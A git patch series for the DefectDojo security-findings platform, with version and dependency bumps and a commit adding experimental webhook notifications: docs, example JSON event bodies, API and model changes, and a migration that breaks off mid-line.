From a48829a4eed456e4ad99a9c8d3669a0a976ae3ed Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 9 Sep 2024 16:09:26 +0000 Subject: [PATCH 01/62] Update versions in application files --- components/package.json | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/components/package.json b/components/package.json index 8b293de9533..49f5862eecd 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.38.1", + "version": "2.39.0-dev", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 42163033648..61744bdfbd6 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.38.1" +appVersion: "2.39.0-dev" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.149 +version: 1.6.150-dev icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From 4c5a4cf9406fee8327fce5defb9649540fbddfb3 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 10 Sep 2024 13:37:49 -0500 Subject: [PATCH 02/62] Bump boto3 from 1.35.14 to 1.35.15 (#10888) Bumps [boto3](https://github.com/boto/boto3) from 1.35.14 to 1.35.15. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.14...1.35.15) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 5a1e3d0ca6d..e21c7a0eaf0 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.14 # Required for Celery Broker AWS (SQS) support +boto3==1.35.15 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From 0ae340c4b974073cacdcce96ba334f567f8adc09 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 11 Sep 2024 22:34:08 -0500 Subject: [PATCH 03/62] Bump boto3 from 1.35.15 to 1.35.16 (#10895) Bumps [boto3](https://github.com/boto/boto3) from 1.35.15 to 1.35.16. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.15...1.35.16) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e21c7a0eaf0..e96a0833561 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.15 # Required for Celery Broker AWS (SQS) support +boto3==1.35.16 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From ea4e733b24339aecbed4ee90becb4388c61ca3a0 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Wed, 11 Sep 2024 22:35:12 -0500 Subject: [PATCH 04/62] Bump pytz from 2024.1 to 2024.2 (#10896) Bumps [pytz](https://github.com/stub42/pytz) from 2024.1 to 2024.2. - [Release notes](https://github.com/stub42/pytz/releases) - [Commits](https://github.com/stub42/pytz/compare/release_2024.1...release_2024.2) --- updated-dependencies: - dependency-name: pytz dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index e96a0833561..a6f7cd79296 100644 --- a/requirements.txt +++ b/requirements.txt @@ -34,7 +34,7 @@ Pillow==10.4.0 # required by django-imagekit psycopg[c]==3.2.1 cryptography==43.0.1 python-dateutil==2.9.0.post0 -pytz==2024.1 +pytz==2024.2 redis==5.0.8 requests==2.32.3 sqlalchemy==2.0.34 # Required by Celery broker transport From e004cb43c72462cdbc1071b371b429d706b35028 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 13 Sep 2024 16:56:36 -0500 Subject: [PATCH 05/62] Bump boto3 from 1.35.16 to 1.35.18 (#10904) Bumps [boto3](https://github.com/boto/boto3) from 1.35.16 to 1.35.18. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.16...1.35.18) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a6f7cd79296..a6ac748122c 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.16 # Required for Celery Broker AWS (SQS) support +boto3==1.35.18 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From d87a3c35dda68b1d55d225e0b727eba8409930a3 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 13 Sep 2024 16:57:01 -0500 Subject: [PATCH 06/62] Bump asteval from 1.0.2 to 1.0.3 (#10903) Bumps [asteval](https://github.com/lmfit/asteval) from 1.0.2 to 1.0.3. - [Release notes](https://github.com/lmfit/asteval/releases) - [Commits](https://github.com/lmfit/asteval/compare/1.0.2...1.0.3) --- updated-dependencies: - dependency-name: asteval dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a6ac748122c..7941ba1544e 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,5 +1,5 @@ # requirements.txt for DefectDojo using Python 3.x -asteval==1.0.2 +asteval==1.0.3 bleach==6.1.0 bleach[css] celery==5.4.0 From 330462d1025f55aa7be5d42539c88851238c05c9 Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Sat, 14 Sep 2024 02:00:28 +0200 Subject: [PATCH 07/62] Notifications: Add support for webhooks (#7311) * Add go-httpbin * First round of changes * move webhooks to separated model,fix err handliing * flake8 * Uset contant instead of strings * Add basic API endpoints * Add owner of endpoint * Update go-httpbin * Basic GUI * per line * upgrade go-httpbin, move db_mig * Disable view and changes if not enabled in setting * Fix full text of status * Update go-httpbin * Move migration * Rename model + flake8 * Rebase db mig * Rearange setting buttons, add connectivity validator * Handle more generic errors from 'requests' * flake8 * Rewrite YAML template to JSON request body * update go-httpbin * Update go-httpbin * Inc db_mig * Upgrade * Ruff * Update httpbin, move db_mig, use as_view * Fix nones, more verbose "missing template" * Prepare templates * Usable by admins only * API tests * Add main unittests * Update 4xx test * Docs: add Transition graph * ruff * Rewrite * Start "webhook.endpoint" in unit-tests * Extend webhook_status_cleanup, add note to related places * More tests * Small adjustments * Set max_length * Better handle nones * Add basic doc + fix findings_list * Update docs * Clean ruff * Fix db_mig * Fix long notes * Clean ruff * Move "webhook.endpoint" from debug docker to dev * Make fields "editable=False" * Try to fix accesslint * Use class-based choices * Shorter default timeout * Update dojo/notifications/views.py Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> * Finish preprocess_request * Update dojo/notifications/helper.py Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> * Show error-times as hint * Try to fix accesslint * Rename `url` to `url_ui` and add `url_api` * inc db_mig * Accept any 2xx as successful * Add permission checker for item in menu * Fix editing for superadmin --------- Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> --- .github/workflows/rest-framework-tests.yml | 4 +- docker-compose.override.dev.yml | 2 + docker-compose.override.unit_tests.yml | 2 + docker-compose.override.unit_tests_cicd.yml | 2 + docs/content/en/integrations/burp-plugin.md | 2 +- docs/content/en/integrations/exporting.md | 2 +- .../en/integrations/google-sheets-sync.md | 2 +- docs/content/en/integrations/languages.md | 2 +- .../notification_webhooks/_index.md | 79 +++ .../notification_webhooks/engagement_added.md | 38 ++ .../notification_webhooks/product_added.md | 32 ++ .../product_type_added.md | 26 + .../notification_webhooks/scan_added.md | 90 ++++ .../notification_webhooks/test_added.md | 44 ++ docs/content/en/integrations/notifications.md | 7 +- docs/content/en/integrations/rate_limiting.md | 2 +- dojo/api_v2/serializers.py | 7 + dojo/api_v2/views.py | 11 + .../0215_webhooks_notifications.py | 130 +++++ dojo/engagement/signals.py | 2 +- dojo/fixtures/dojo_testdata.json | 57 ++- dojo/forms.py | 27 + dojo/models.py | 38 ++ dojo/notifications/helper.py | 180 ++++++- dojo/notifications/urls.py | 4 + dojo/notifications/views.py | 305 ++++++++++- dojo/product/signals.py | 4 +- dojo/product_type/signals.py | 4 +- dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 5 +- dojo/templates/base.html | 7 + .../dojo/add_notification_webhook.html | 13 + .../dojo/delete_notification_webhook.html | 12 + .../dojo/edit_notification_webhook.html | 15 + dojo/templates/dojo/notifications.html | 3 + dojo/templates/dojo/system_settings.html | 2 +- .../dojo/view_notification_webhooks.html | 101 ++++ dojo/templates/dojo/view_product_details.html | 2 +- .../webhooks/engagement_added.tpl | 2 + .../notifications/webhooks/other.tpl | 1 + .../notifications/webhooks/product_added.tpl | 2 + .../webhooks/product_type_added.tpl | 2 + .../notifications/webhooks/scan_added.tpl | 12 + .../webhooks/scan_added_empty.tpl | 1 + .../webhooks/subtemplates/base.tpl | 13 + .../webhooks/subtemplates/engagement.tpl | 13 + .../webhooks/subtemplates/findings_list.tpl | 12 + .../webhooks/subtemplates/product.tpl | 13 + .../webhooks/subtemplates/product_type.tpl | 8 + .../webhooks/subtemplates/test.tpl | 13 + .../notifications/webhooks/test_added.tpl | 2 + dojo/templatetags/display_tags.py | 5 + dojo/urls.py | 2 + requirements.txt | 1 + tests/notifications_test.py | 5 + unittests/test_notifications.py | 483 +++++++++++++++++- unittests/test_rest_framework.py | 23 + 57 files changed, 1848 insertions(+), 32 deletions(-) create mode 100644 docs/content/en/integrations/notification_webhooks/_index.md create mode 100644 docs/content/en/integrations/notification_webhooks/engagement_added.md create mode 100644 docs/content/en/integrations/notification_webhooks/product_added.md create mode 100644 docs/content/en/integrations/notification_webhooks/product_type_added.md create mode 100644 docs/content/en/integrations/notification_webhooks/scan_added.md create mode 100644 docs/content/en/integrations/notification_webhooks/test_added.md create mode 100644 dojo/db_migrations/0215_webhooks_notifications.py create mode 100644 dojo/templates/dojo/add_notification_webhook.html create mode 100644 dojo/templates/dojo/delete_notification_webhook.html create mode 100644 dojo/templates/dojo/edit_notification_webhook.html create mode 100644 dojo/templates/dojo/view_notification_webhooks.html create mode 100644 dojo/templates/notifications/webhooks/engagement_added.tpl create mode 100644 dojo/templates/notifications/webhooks/other.tpl create mode 100644 dojo/templates/notifications/webhooks/product_added.tpl create mode 100644 dojo/templates/notifications/webhooks/product_type_added.tpl create mode 100644 dojo/templates/notifications/webhooks/scan_added.tpl create mode 120000 dojo/templates/notifications/webhooks/scan_added_empty.tpl create mode 100644 dojo/templates/notifications/webhooks/subtemplates/base.tpl create mode 100644 dojo/templates/notifications/webhooks/subtemplates/engagement.tpl create mode 100644 dojo/templates/notifications/webhooks/subtemplates/findings_list.tpl create mode 100644 dojo/templates/notifications/webhooks/subtemplates/product.tpl create mode 100644 dojo/templates/notifications/webhooks/subtemplates/product_type.tpl create mode 100644 dojo/templates/notifications/webhooks/subtemplates/test.tpl create mode 100644 dojo/templates/notifications/webhooks/test_added.tpl diff --git a/.github/workflows/rest-framework-tests.yml b/.github/workflows/rest-framework-tests.yml index 907ecf92968..f153a368ba9 100644 --- a/.github/workflows/rest-framework-tests.yml +++ b/.github/workflows/rest-framework-tests.yml @@ -34,8 +34,8 @@ jobs: run: docker/setEnv.sh unit_tests_cicd # phased startup so we can use the exit code from unit test container - - name: Start Postgres - run: docker compose up -d postgres + - name: Start Postgres and webhook.endpoint + run: docker compose up -d postgres webhook.endpoint # no celery or initializer needed for unit tests - name: Unit tests diff --git a/docker-compose.override.dev.yml b/docker-compose.override.dev.yml index f3a281af061..cf60d8d00a3 100644 --- a/docker-compose.override.dev.yml +++ b/docker-compose.override.dev.yml @@ -53,3 +53,5 @@ services: published: 8025 protocol: tcp mode: host + "webhook.endpoint": + image: mccutchen/go-httpbin:v2.14.0@sha256:e0f398a0a29e7cf00a2467326344d70b4d89d0786d8f9a3287c2a0371c804823 diff --git a/docker-compose.override.unit_tests.yml b/docker-compose.override.unit_tests.yml index 164d7a87084..ccf3c84030a 100644 --- a/docker-compose.override.unit_tests.yml +++ b/docker-compose.override.unit_tests.yml @@ -51,6 +51,8 @@ services: redis: image: busybox:1.36.1-musl entrypoint: ['echo', 'skipping', 'redis'] + "webhook.endpoint": + image: mccutchen/go-httpbin:v2.14.0@sha256:e0f398a0a29e7cf00a2467326344d70b4d89d0786d8f9a3287c2a0371c804823 volumes: defectdojo_postgres_unit_tests: {} defectdojo_media_unit_tests: {} diff --git a/docker-compose.override.unit_tests_cicd.yml b/docker-compose.override.unit_tests_cicd.yml index b39f4cf034d..141ad7227dc 100644 --- a/docker-compose.override.unit_tests_cicd.yml +++ b/docker-compose.override.unit_tests_cicd.yml @@ -50,6 +50,8 @@ services: redis: image: busybox:1.36.1-musl entrypoint: ['echo', 'skipping', 'redis'] + "webhook.endpoint": + image: mccutchen/go-httpbin:v2.14.0@sha256:e0f398a0a29e7cf00a2467326344d70b4d89d0786d8f9a3287c2a0371c804823 volumes: defectdojo_postgres_unit_tests: {} defectdojo_media_unit_tests: {} diff --git a/docs/content/en/integrations/burp-plugin.md b/docs/content/en/integrations/burp-plugin.md index 400b37c0f2a..ab3285ceda4 100644 --- a/docs/content/en/integrations/burp-plugin.md +++ b/docs/content/en/integrations/burp-plugin.md @@ -2,7 +2,7 @@ title: "Defect Dojo Burp plugin" description: "Export findings directly from Burp to DefectDojo." draft: false -weight: 8 +weight: 9 --- **Please note: The DefectDojo Burp Plugin has been sunset and is no longer a supported feature.** diff --git a/docs/content/en/integrations/exporting.md b/docs/content/en/integrations/exporting.md index da17df7d93b..7a42d27b17e 100644 --- a/docs/content/en/integrations/exporting.md +++ b/docs/content/en/integrations/exporting.md @@ -2,7 +2,7 @@ title: "Exporting" description: "DefectDojo has the ability to export findings." draft: false -weight: 11 +weight: 12 --- diff --git a/docs/content/en/integrations/google-sheets-sync.md b/docs/content/en/integrations/google-sheets-sync.md index b6e97f72f84..456a694fc6e 100644 --- a/docs/content/en/integrations/google-sheets-sync.md +++ b/docs/content/en/integrations/google-sheets-sync.md @@ -2,7 +2,7 @@ title: "Google Sheets synchronisation" description: "Export finding details to Google Sheets and upload changes from Google Sheets." draft: false -weight: 7 +weight: 8 --- **Please note - the Google Sheets feature has been deprecated as of DefectDojo version 2.21.0 - these documents are for reference only.** diff --git a/docs/content/en/integrations/languages.md b/docs/content/en/integrations/languages.md index 17a322c8f90..a78ed137e69 100644 --- a/docs/content/en/integrations/languages.md +++ b/docs/content/en/integrations/languages.md @@ -2,7 +2,7 @@ title: "Languages and lines of code" description: "You can import an analysis of languages used in a project, including lines of code." draft: false -weight: 9 +weight: 10 --- ## Import of languages for a project diff --git a/docs/content/en/integrations/notification_webhooks/_index.md b/docs/content/en/integrations/notification_webhooks/_index.md new file mode 100644 index 00000000000..d8fe606cffa --- /dev/null +++ b/docs/content/en/integrations/notification_webhooks/_index.md @@ -0,0 +1,79 @@ +--- +title: "Notification Webhooks (experimental)" +description: "How to setup and use webhooks" +weight: 7 +chapter: true +--- + +Webhooks are HTTP requests coming from the DefectDojo instance towards user-defined webserver which expects this kind of incoming traffic. + +## Transition graph: + +It is not unusual that in some cases webhook can not be performed. It is usually connected to network issues, server misconfiguration, or running upgrades on the server. DefectDojo needs to react to these outages. It might temporarily or permanently disable related endpoints. The following graph shows how it might change the status of the webhook definition based on HTTP responses (or manual user interaction). + +```mermaid +flowchart TD + + START{{Endpoint created}} + ALL{All states} + STATUS_ACTIVE([STATUS_ACTIVE]) + STATUS_INACTIVE_TMP + STATUS_INACTIVE_PERMANENT + STATUS_ACTIVE_TMP([STATUS_ACTIVE_TMP]) + END{{Endpoint removed}} + + START ==> STATUS_ACTIVE + STATUS_ACTIVE --HTTP 200 or 201 --> STATUS_ACTIVE + STATUS_ACTIVE --HTTP 5xx
or HTTP 429
or Timeout--> STATUS_INACTIVE_TMP + STATUS_ACTIVE --Any HTTP 4xx response
or any other HTTP response
or non-HTTP error--> STATUS_INACTIVE_PERMANENT + STATUS_INACTIVE_TMP -.After 60s.-> STATUS_ACTIVE_TMP + STATUS_ACTIVE_TMP --HTTP 5xx
or HTTP 429
or Timeout
within 24h
from the first error-->STATUS_INACTIVE_TMP + STATUS_ACTIVE_TMP -.After 24h.-> STATUS_ACTIVE + STATUS_ACTIVE_TMP --HTTP 200 or 201 --> STATUS_ACTIVE_TMP + STATUS_ACTIVE_TMP --HTTP 5xx
or HTTP 429
or Timeout
within 24h from the first error
or any other HTTP response or error--> STATUS_INACTIVE_PERMANENT + ALL ==Activation by user==> STATUS_ACTIVE + ALL ==Deactivation by user==> STATUS_INACTIVE_PERMANENT + ALL ==Removal of endpoint by user==> END +``` + +Notes: + +1. Transitions: + - bold: manual changes by user + - dotted: automated by celery + - others: based on responses on webhooks +1. Nodes: + - Stadium-shaped: Active - following webhook can be sent + - Rectangles: Inactive - performing of webhook will fail (and not retried) + - Hexagonal: Initial and final states + - Rhombus: All states (meta node to make the graph more readable) + +## Body and Headers + +The body of each request is JSON which contains data about related events like names and IDs of affected elements. +Examples of bodies are on pages related to each event (see below). + +Each request contains the following headers. They might be useful for better handling of events by server this process events. + +```yaml +User-Agent: DefectDojo- +X-DefectDojo-Event: +X-DefectDojo-Instance: +``` +## Disclaimer + +This functionality is new and in experimental mode. This means Functionality might generate breaking changes in following DefectDojo releases and might not be considered final. + +However, the community is open to feedback to make this functionality better and transform it stable as soon as possible. + +## Roadmap + +There are a couple of known issues that are expected to be implemented as soon as core functionality is considered ready. + +- Support events - Not only adding products, product types, engagements, tests, or upload of new scans but also events around SLA +- User webhook - right now only admins can define webhooks; in the future also users will be able to define their own +- Improvement in UI - add filtering and pagination of webhook endpoints + +## Events + + \ No newline at end of file diff --git a/docs/content/en/integrations/notification_webhooks/engagement_added.md b/docs/content/en/integrations/notification_webhooks/engagement_added.md new file mode 100644 index 00000000000..64fd7746ec2 --- /dev/null +++ b/docs/content/en/integrations/notification_webhooks/engagement_added.md @@ -0,0 +1,38 @@ +--- +title: "Event: engagement_added" +weight: 3 +chapter: true +--- + +## Event HTTP header +```yaml +X-DefectDojo-Event: engagement_added +``` + +## Event HTTP body +```json +{ + "description": null, + "engagement": { + "id": 7, + "name": "notif eng", + "url_api": "http://localhost:8080/api/v2/engagements/7/", + "url_ui": "http://localhost:8080/engagement/7" + }, + "product": { + "id": 4, + "name": "notif prod", + "url_api": "http://localhost:8080/api/v2/products/4/", + "url_ui": "http://localhost:8080/product/4" + }, + "product_type": { + "id": 4, + "name": "notif prod type", + "url_api": "http://localhost:8080/api/v2/product_types/4/", + "url_ui": "http://localhost:8080/product/type/4" + }, + "url_api": "http://localhost:8080/api/v2/engagements/7/", + "url_ui": "http://localhost:8080/engagement/7", + "user": null +} +``` \ No newline at end of file diff --git a/docs/content/en/integrations/notification_webhooks/product_added.md b/docs/content/en/integrations/notification_webhooks/product_added.md new file mode 100644 index 00000000000..2d90a6a681f --- /dev/null +++ b/docs/content/en/integrations/notification_webhooks/product_added.md @@ -0,0 +1,32 @@ +--- +title: "Event: product_added" +weight: 2 +chapter: true +--- + +## Event HTTP header +```yaml +X-DefectDojo-Event: product_added +``` + +## Event HTTP body +```json +{ + "description": null, + "product": { + "id": 4, + "name": "notif prod", + "url_api": "http://localhost:8080/api/v2/products/4/", + "url_ui": "http://localhost:8080/product/4" + }, + "product_type": { + "id": 4, + "name": "notif prod type", + "url_api": "http://localhost:8080/api/v2/product_types/4/", + "url_ui": "http://localhost:8080/product/type/4" + }, + "url_api": "http://localhost:8080/api/v2/products/4/", + "url_ui": "http://localhost:8080/product/4", + "user": null +} +``` \ No newline at end of file diff --git a/docs/content/en/integrations/notification_webhooks/product_type_added.md b/docs/content/en/integrations/notification_webhooks/product_type_added.md new file mode 100644 index 00000000000..1171f513831 --- /dev/null +++ b/docs/content/en/integrations/notification_webhooks/product_type_added.md @@ -0,0 +1,26 @@ +--- +title: "Event: product_type_added" +weight: 1 +chapter: true +--- + +## Event HTTP header +```yaml +X-DefectDojo-Event: product_type_added +``` + +## Event HTTP body +```json +{ + "description": null, + "product_type": { + "id": 4, + "name": "notif prod type", + "url_api": "http://localhost:8080/api/v2/product_types/4/", + "url_ui": "http://localhost:8080/product/type/4" + }, + "url_api": "http://localhost:8080/api/v2/product_types/4/", + "url_ui": "http://localhost:8080/product/type/4", + "user": null +} +``` \ No newline at end of file diff --git a/docs/content/en/integrations/notification_webhooks/scan_added.md b/docs/content/en/integrations/notification_webhooks/scan_added.md new file mode 100644 index 00000000000..27a40e6cab1 --- /dev/null +++ b/docs/content/en/integrations/notification_webhooks/scan_added.md @@ -0,0 +1,90 @@ +--- +title: "Event: scan_added and scan_added_empty" +weight: 5 +chapter: true +--- + +Event `scan_added_empty` describes a situation when reimport did not affect the existing test (no finding has been created or closed). + +## Event HTTP header for scan_added +```yaml +X-DefectDojo-Event: scan_added +``` + +## Event HTTP header for scan_added_empty +```yaml +X-DefectDojo-Event: scan_added_empty +``` + +## Event HTTP body +```json +{ + "description": null, + "engagement": { + "id": 7, + "name": "notif eng", + "url_api": "http://localhost:8080/api/v2/engagements/7/", + "url_ui": "http://localhost:8080/engagement/7" + }, + "finding_count": 4, + "findings": { + "mitigated": [ + { + "id": 233, + "severity": "Medium", + "title": "Mitigated Finding", + "url_api": "http://localhost:8080/api/v2/findings/233/", + "url_ui": "http://localhost:8080/finding/233" + } + ], + "new": [ + { + "id": 232, + "severity": "Critical", + "title": "New Finding", + "url_api": "http://localhost:8080/api/v2/findings/232/", + "url_ui": "http://localhost:8080/finding/232" + } + ], + "reactivated": [ + { + "id": 234, + "severity": "Low", + "title": "Reactivated Finding", + "url_api": "http://localhost:8080/api/v2/findings/234/", + "url_ui": "http://localhost:8080/finding/234" + } + ], + "untouched": [ + { + "id": 235, + "severity": "Info", + "title": "Untouched Finding", + "url_api": "http://localhost:8080/api/v2/findings/235/", + "url_ui": "http://localhost:8080/finding/235" + } + ] + }, + "product": { + "id": 4, + "name": "notif prod", + "url_api": "http://localhost:8080/api/v2/products/4/", + "url_ui": "http://localhost:8080/product/4" + }, + "product_type": { + "id": 4, + "name": "notif prod type", + "url_api": "http://localhost:8080/api/v2/product_types/4/", + "url_ui": "http://localhost:8080/product/type/4" + }, + "test": { + "id": 90, + "title": "notif test", + "url_api": "http://localhost:8080/api/v2/tests/90/", + "url_ui": "http://localhost:8080/test/90" + }, + "url_api": "http://localhost:8080/api/v2/tests/90/", + "url_ui": "http://localhost:8080/test/90", + "user": null +} +``` \ No newline at end of file diff --git a/docs/content/en/integrations/notification_webhooks/test_added.md b/docs/content/en/integrations/notification_webhooks/test_added.md new file mode 100644 index 00000000000..8614a80e0a6 --- /dev/null +++ b/docs/content/en/integrations/notification_webhooks/test_added.md @@ -0,0 +1,44 @@ +--- +title: "Event: test_added" +weight: 4 +chapter: true +--- + +## Event HTTP header +```yaml +X-DefectDojo-Event: test_added +``` + +## Event HTTP body +```json +{ + "description": null, + "engagement": { + "id": 7, + "name": "notif eng", + "url_api": "http://localhost:8080/api/v2/engagements/7/", + "url_ui": "http://localhost:8080/engagement/7" + }, + "product": { + "id": 4, + "name": "notif prod", + "url_api": "http://localhost:8080/api/v2/products/4/", + "url_ui": "http://localhost:8080/product/4" + }, + "product_type": { + "id": 4, + "name": "notif prod type", + "url_api": "http://localhost:8080/api/v2/product_types/4/", + "url_ui": "http://localhost:8080/product/type/4" + }, + "test": { + "id": 90, + "title": "notif test", + "url_api": "http://localhost:8080/api/v2/tests/90/", + "url_ui": "http://localhost:8080/test/90" + }, + "url_api": "http://localhost:8080/api/v2/tests/90/", + "url_ui": "http://localhost:8080/test/90", + "user": null +} +``` \ No newline at end of file diff --git a/docs/content/en/integrations/notifications.md b/docs/content/en/integrations/notifications.md index d5af295f0eb..803388797cd 100644 --- a/docs/content/en/integrations/notifications.md +++ b/docs/content/en/integrations/notifications.md @@ -18,6 +18,7 @@ The following notification methods currently exist: - Email - Slack - Microsoft Teams + - Webhooks - Alerts within DefectDojo (default) You can set these notifications on a global scope (if you have @@ -124,4 +125,8 @@ However, there is a specific use-case when the user decides to disable notificat The scope of this setting is customizable (see environmental variable `DD_NOTIFICATIONS_SYSTEM_LEVEL_TRUMP`). -For more information about this behavior see the [related pull request #9699](https://github.com/DefectDojo/django-DefectDojo/pull/9699/) \ No newline at end of file +For more information about this behavior see the [related pull request #9699](https://github.com/DefectDojo/django-DefectDojo/pull/9699/) + +## Webhooks (experimental) + +DefectDojo also supports webhooks that follow the same events as other notifications (you can be notified in the same situations). Details about setup are described in [related page](../notification_webhooks/). diff --git a/docs/content/en/integrations/rate_limiting.md b/docs/content/en/integrations/rate_limiting.md index 0cac784c5f5..1ea76ace5b3 100644 --- a/docs/content/en/integrations/rate_limiting.md +++ b/docs/content/en/integrations/rate_limiting.md @@ -2,7 +2,7 @@ title: "Rate Limiting" description: "Configurable rate limiting on the login page to mitigate brute force attacks" draft: false -weight: 9 +weight: 11 --- diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py index c9a87a8362d..dc8acb40285 100644 --- a/dojo/api_v2/serializers.py +++ b/dojo/api_v2/serializers.py @@ -77,6 +77,7 @@ Note_Type, NoteHistory, Notes, + Notification_Webhooks, Notifications, Product, Product_API_Scan_Configuration, @@ -3172,3 +3173,9 @@ def create(self, validated_data): raise serializers.ValidationError(msg) else: raise + + +class NotificationWebhooksSerializer(serializers.ModelSerializer): + class Meta: + model = Notification_Webhooks + fields = "__all__" diff --git a/dojo/api_v2/views.py b/dojo/api_v2/views.py index 05d16521069..7ae9925479a 100644 --- a/dojo/api_v2/views.py +++ b/dojo/api_v2/views.py @@ -111,6 +111,7 @@ Network_Locations, Note_Type, Notes, + Notification_Webhooks, Notifications, Product, Product_API_Scan_Configuration, @@ -3332,3 +3333,13 @@ class AnnouncementViewSet( def get_queryset(self): return Announcement.objects.all().order_by("id") + + +class NotificationWebhooksViewSet( + PrefetchDojoModelViewSet, +): + serializer_class = serializers.NotificationWebhooksSerializer + queryset = Notification_Webhooks.objects.all() + filter_backends = (DjangoFilterBackend,) + filterset_fields = "__all__" + permission_classes = (permissions.IsSuperUser, DjangoModelPermissions) # TODO: add permission also for other users diff --git a/dojo/db_migrations/0215_webhooks_notifications.py b/dojo/db_migrations/0215_webhooks_notifications.py new file mode 100644 index 00000000000..cc65ce43f1b --- /dev/null +++ b/dojo/db_migrations/0215_webhooks_notifications.py @@ -0,0 +1,130 @@ +# Generated by Django 5.0.8 on 2024-08-16 17:07 + +import django.db.models.deletion +import multiselectfield.db.fields +from django.db import migrations, models + + +class Migration(migrations.Migration): + + dependencies = [ + ('dojo', '0214_test_type_dynamically_generated'), + ] + + operations = [ + migrations.AddField( + model_name='system_settings', + name='enable_webhooks_notifications', + field=models.BooleanField(default=False, verbose_name='Enable Webhook notifications'), + ), + migrations.AddField( + model_name='system_settings', + name='webhooks_notifications_timeout', + field=models.IntegerField(default=10, help_text='How many seconds will DefectDojo waits for response from webhook endpoint'), + ), + migrations.AlterField( + model_name='notifications', + name='auto_close_engagement', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='close_engagement', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='code_review', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 'msteams'), ('mail', 'mail'), ('webhooks', 'webhooks'), ('alert', 'alert')], default=('alert', 'alert'), max_length=33), + ), + migrations.AlterField( + model_name='notifications', + name='engagement_added', + field=multiselectfield.db.fields.MultiSelectField(blank=True, choices=[('slack', 'slack'), ('msteams', 